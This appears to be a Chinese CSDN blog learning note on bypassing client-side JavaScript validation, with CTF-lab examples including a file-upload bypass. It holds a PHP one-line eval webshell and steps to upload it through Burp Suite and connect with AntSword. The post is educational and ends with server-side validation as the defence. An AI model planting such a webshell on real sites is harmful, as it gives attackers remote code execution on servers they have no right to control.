js绕过漏洞学习

已于 2023-07-21 12:00:26 修改
阅读量1.2k 收藏 11
点赞数 15
文章标签: javascript 网络安全
于 2023-07-20 12:04:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74012678/article/details/131827379
版权

js绕过

JS绕过是指利用各种技术手段绕过网站或应用程序中使用的JavaScript代码的安全性措施

原理

利用JavaScript在客户端执行以及前端验证等机制的特性,从而绕过网站或应用程序的安全防护,执行未经授权的操作或窃取敏感信息。

  1. JavaScript是一种在客户端执行的脚本语言,其代码在用户的浏览器中运行

  2. 输入验证不完善:网站和应用程序通常使用JavaScript进行前端输入验证,以确保用户提供的数据是有效和安全的。如果输入验证不完善或者完全依赖客户端验证,攻击者可以通过提交恶意数据来绕过这些验证。

  3. 前端认证绕过:如果网站或应用程序依赖于前端认证机制来限制用户权限,攻击者可以模拟或篡改这些认证信息,从而获得未授权的访问权限(禁用js)

漏洞操作

1.禁用js

F12禁用js

实战:摸鱼大闯关 - Stage 15 - 怎么做都错~(#`Д´)ノ

        function check(){
            var passwd = document.getElementById("passwd").value;
            if (passwd === "") {
                alert("错误: 密码不能为空!");
            } else {
                alert("错误: 密码就是空的!");
            }
            return false;
        }

其他方法:

修改前端代码:

F12 -元素-选中填写的表单-以HTML格式修改

添加<button type="submit">提交</button> 点击提交

原理(?):js代码只检测了原本提交的密码,没有检测添加按钮提交的密码

2.利用bp抓包绕过

实战:BUUCTF Upload-Labs-Linux

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

1.编辑txt文本一句话木马

<?php @eval($_POST['attack']);?>

2.将文件后缀改为.jpg(js允许的格式)

3.上传文件,然后使用bp抓取上传的数据包

4.修改文件后缀为.php, 放包

5.复制图片地址 ,使用蚁剑连接


关键函数:

  1. document.getElementsByName('upload_file')[0].value;

  • 这是通过JavaScript的DOM(文档对象模型)获取名为 "upload_file" 的文件上传表单元素的值,即用户选择的上传文件的路径。

  • document.getElementsByName('upload_file') 是一个获取具有指定名称的所有元素的方法,它返回一个节点列表(NodeList)对象。在这里,我们假设只有一个元素符合名称 "upload_file",所以使用索引 [0] 来获取第一个匹配的元素。

  • .value 是获取元素的值的属性。在这个代码段中,获取到的值是用户选择的文件的路径

  1. allow_ext.indexOf(ext_name + "|") == -1

  • allow_ext.indexOf(ext_name + "|") 是一个字符串的查找方法。它用于检查 ext_name 是否包含在 allow_ext 这个字符串中。

  • indexOf() 方法可返回数组中某个指定的元素位置。也可返回某个指定的字符串值在字符串中首次出现的位置。若没有检索到则返回-1;

  • ext_name 是用户选择上传文件的后缀名,allow_ext 是允许上传的文件类型组成的字符串,例如 ".jpg|.png|.gif"。ext_name + "|" 这一部分是为了保证 ext_nameallow_ext 中的查找不会出错,避免部分后缀名的误匹配,例如 ".png" 可能会匹配到 ".png2" 这样的后缀名。 如果 ext_name 不在 allow_ext 中(即返回值为 -1),则说明用户选择的文件类型不允许上传。

漏洞利用

  1. 数据泄露:绕过输入验证或其他安全措施,访问和窃取网站或应用程序中的敏感数据,例如用户个人信息、信用卡信息、登录凭据等。

  2. 身份伪装:通过前端认证绕过或篡改认证信息,获取其他用户的登录权限,从而冒充合法用户进行未经授权的操作。

  3. 会话劫持:利用JS绕过漏洞来劫持用户的会话,绕过正常登录流程,从而获取未经授权的访问权限。

  4. 恶意操作:可以通过绕过安全措施执行恶意代码,对网站或应用程序进行破坏、篡改或删除关键数据,导致服务中断或故障。

  5. 网站挂马:利用JS绕过漏洞在网站或应用程序中插入恶意脚本,将其作为恶意代码传播的途径,让其他用户也受到攻击。

  6. 拒绝服务攻击(DDos):利用JS绕过漏洞执行恶意代码,导致服务器过载,从而使网站或应用程序无法正常响应用户请求,造成拒绝服务。

漏洞防御

  1. 避免直接在前端进行验证,因为攻击者可以轻易绕过这种验证。

  2. 对于重要的操作和敏感数据,始终在后端服务器进行验证。不要依赖前端的验证

Hugh_404
关注
漏洞复现】Linksys E2000 position.js 身份验证绕过漏洞(CVE-2024-27497)
qq_67810151的博客
03-07 833
Linksys E2000 v1.0.06 存在身份验证绕过漏洞,未授权的攻击者可以通过该漏洞获取管理员的当前会话,从而绕过身份验证。
泛微e-cology10 appThirdLogin 权限绕过漏洞
iSee857的博客
08-31 955
泛微Ecology-10.0存在权限绕过漏洞,该漏洞通过Ecology-10.0获取管理员访问令牌,然后通过伪造cookie使用授权的令牌进行登陆,登录后可使用系统管理员权限进行操作。step2 利用/papi/passport/login/generateEteamsId接口与step1获取的serviceTicketId进行请求伪造,获取登录认证token。step1 使用/papi/passport/rest/appThirdLogin接口获取服务器认证票据。
绕开客户端JS验证
柠檬树
06-18 4471
我们在进行表单提交之前往往要进行表单校验,如文本框是否为空?是否包含为法字段?然而在进行web开发的过程中仅仅进行前端校验是远远不够的。因为能通过一些方式跳过前端的校验,因此服务端也非常有必要写校验的方法。
JS前端绕过
看着博客敲代码
06-26 3188
web应用对用户上传的文件进行了校验,该校验是通过前端JavaScript代码完成。恶意用户对前端JavaScript进行修改或通过抓包软件篡改上传文件的格式,就能绕过基于JS的前端校验。
前端安全——JS 代码绕过
a123456234的博客
10-25 1295
在 Web 应用开发中,前端代码的开放性为恶意用户提供了绕过验证和控制的机会。为了保障应用的安全性,应采取多方面的防护措施。首先,始终在服务器端进行严格的输入验证,确保数据的安全性和完整性。其次,合理使用 Vue 的响应式特性,如 v-if 和 v-show,并在事件处理函数中进行状态检查,防止用户通过修改浏览器控制台中的代码或 CSS 属性来绕过前端控制。此外,可以考虑对前端代码进行混淆处理,增加攻击者的破解难度。综合这些措施,可以有效提升 Web 应用的安全性。
JavaScript绕过
Whatsoever1的博客
02-23 654
此外, 也可以通过Burp Suite 抓包/改包的方式, 先将文件的扩展名修改为符合脚本要求的格式(例如. jpg、. png或者. gif),然后通过 Burp Suite抓包修改扩展名的方式绕过。在JavaScript 文件上传防护中, 由于对上传文件的检测发生在客户端, 因此是一种不安全的文件上传防护方式,攻击者可以很轻松地绕过。var errMsg = "该文件不允许上传, 请上传" + allow_ext + "类型的文件,当前文件类型为: " + ext_name;//提取上传文件的类型。
1-2 【实验】02-前台JS验证审计+绕过
山兔的博客
03-06 1649
上传漏洞绕过,本质上跟我们上一篇讲的SQL注入绕过,没有本质区别,SQL注入绕过绕过后台对一些特殊函数、特殊字符的过滤,那么上传漏洞其实也一样,绕过后台对上传文件名称以及内容的一些过滤,所以说,这两者漏洞之间,我们抓包的话,会发现,这两个包里面的内容,其实差不多,要么get请求,要么post请求,那么对应我们上传漏洞,其实 post请求内容,分别对应请求头,请求体,所以说,我们上传漏洞和注入漏洞,抓包之后,它http请求,没有太大区别,我们之前讲的,web漏洞,都是发生在http请求里面,是不谋而合的 我
漏洞复现学习:openfire鉴权绕过漏洞复现(CVE-2024-32315)_openfireadministrationconsole
2401_84254057的博客
05-04 1204
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。第一张图里的代码,它会先判读是否含有setup/setup-*,如过含有就会跳到下面的判读,接下来的判断就是对用户输入的字符串进行一个过滤,如果用户输入的字符串不含有**…恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;到此为止,大概1个月的时间。
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
cc123489ll的博客
06-06 1133
本文仅做复现,不做分析!其实就是默认keyshiro550exchange的jwt伪造等,都是类似的问题。Nacos是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。目前Nacos身份认证绕过漏洞(),开源服务管理平台Nacos在默认配置下未对进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。基本上都受到了影响,最新的版本已修复漏洞
Next.Js 权限绕过漏洞复现(附脚本)(CVE-2025-29927)
最新发布
iSee857的博客
03-24 346
漏洞源于当中间件需要向内部路由发出请求时(例如获取数据或验证信息),Next.js 会自动添加x-middleware-subrequest头,以标识这是一个内部请求,防止中间件陷入无限循环。漏洞出现的关键点是 Next.js 没有正确验证这个头的来源,当内部5次重定向之后则跳过鉴权流程。当外部请求携带此头时,中间件错误地将其识别为内部子请求。(CVE-2025-29927)
js逆向--绕过debugger(二)
lyccomcn的博客
09-05 246
在debugger所在的行号处右键,点击“添加条件断点”,在对话框中输入1===0,回车,点击继续执行脚本,即可绕过debugger。在进入方法之前,下断点,刷新页面,在控制台将debugger所在的方法置空,可以绕过debugger。这种debugger方式的效果是,只要打开开发者工具,当前页面就会自动关闭。上一篇文章中,笔者已经介绍了4种方法,接下来介绍第5种方法。
记一次js加密绕过
m0_46317063的博客
02-22 377
一次简单的js加密绕过
绕过Javascript检查
dlz00001的博客
06-10 240
如今,Web应用程序提供注册页面时,通常会复制密码字段(有时甚至是电子邮件字段)。 通过两次输入密码,它可以确保您没有输入任何错误。 并且您下次尝试登录时不必重置密码。 如果您实际输入密码,这是有道理的。 我,我正在使用密码管理器。 这意味着,我将两次从密码管理器获取的密码进行复制粘贴。 到目前为止,一切都很好。 现在,一些Web应用程序假定人们确实输入了密码。 更糟糕的是,这些应用程...
JS调试检测 及 绕过方法
zzzzls 的博客
03-05 2701
JS调试检测 及 绕过方法
B-7:JavaScript安全绕过
m0_45155797的博客
04-13 188
B-7:JavaScript安全绕过 任务环境说明:  服务器场景名称:Server2201(关闭链接)  服务器场景操作系统:centos5.5 1.使用渗透机场景kali中工具扫描服务器,将服务器上apache版本号作为flag提交; 2.使用渗透机场景windows7访问服务其场景中的网站(网站路径为IP/javascript),找到网站首页中flag并提交; 3.使用渗透机场景windows7根据第二题的入口继续访问服务器本题场景,通过提示得到flag并提交; 4.使用渗透机场景windows7
JS沙箱绕过以及竞争条件型漏洞复现
08-02 750
JS沙箱绕过以及竞争条件型漏洞复现
2023年中职“网络安全“—JavaScript安全绕过
weixin_57060854的博客
11-15 531
题目存在泄露flag与题目地址,解决方法可以把运算过程给php处理,然后在由php判断是正确,最后在下方下一题地址,在下一题地址弹出flag拿flag可以直接使用curl 网页地址这样更为便捷。
【文件上传绕过】——前端检测_前端js验证漏洞
weixin_45588247的博客
08-13 7192
文章目录一、实验目的:二、工具:三、实验环境:四、实验目的:五、漏洞说明:1. 漏洞原理:2. `js前端验证`过程代码:六、实验过程:1. 判断是否存在前端`js绕过漏洞`:1.1 上传非图片文件:1.2 上传图片文件:2. 绕过方法一:删除或者禁用js:2.1 upload-labs闯关游戏(Pass-01):2.2 DVWA靶场-low级别:3. 绕过方法二:使用代理上传文件,比如`Burp Suite`: 一、实验目的: 1、通过本次实验掌握js验证原理; 2、通过自写代码学习js验证过程; 3、
2023年中职网络安全竞赛JavaScript安全绕过解析(保姆级)
旺仔Sec&blog
01-07 741
2023中职网络安全技能竞赛之JavaScript安全绕过保姆级解析教程及Flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值